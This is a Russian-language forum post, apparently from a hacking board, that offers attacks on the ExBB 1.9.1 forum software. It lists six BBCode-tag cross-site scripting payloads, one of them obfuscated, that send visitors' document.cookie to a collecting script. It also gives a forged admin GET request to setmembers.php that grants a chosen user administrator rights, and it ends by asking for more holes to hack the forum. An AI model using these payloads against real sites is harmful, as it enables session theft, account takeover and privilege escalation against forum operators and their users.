XSS в каждом теге
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javasc ript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/color]
[size='z="]"style='background:url(javascript:docum ent.images[0].src="http://localhost/1.php?"+document.cookie)'[/size]
[url]'z="style='background:url(javascript:document .images[0].src=/http:@@localhost@1.php?/.source.replace(/@/g,String.fromCharCode(47))+document.cookie)'[/url]
[url="]"style='background:url(javascript:document. images[0].src="http://localhost/1.php?"+document.cookie)'[/url]
[img]http://"z='[/img]'style='background:url(javascript:document.ima ges[0].src="http://localhost/1.php?"+document.cookie)'
[img]"onerror="document.images[0].src='http://localhost/1.php'+String.fromCharCode(63)+document.cookie[/img][/QUOTE]<span id='postcolor'>
кроме xss есть еще одна бага
форма редактирования пользователей из админки передается методом GET
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://localhost/exbb/setmembers.php?action=edit_user&checkaction=ye s&userid=3&membertitle=&emailaddress=l ol@lol.ru&newname=lol&password=&homepa ge=&aolname=&icqnumber=&location=& interests=&signature=&numberofposts=0& avatar=noavatar.gif&membercode=ad&submit=% CE%F2%EF%F0%E0%E2%E8%F2%FC[/QUOTE]<span id='postcolor'>
userid=3 - id пользователя для поднятия прав
newname=ваше имя
кто нить может ответить на вопрос есть лиш ещё какие нить баги или дырки или хоть какие нить ещё зацепки на взлом форума Powered by ExBB 1.9.1 или все он стал самым надежным и без бажным форумоммМММ!!!!!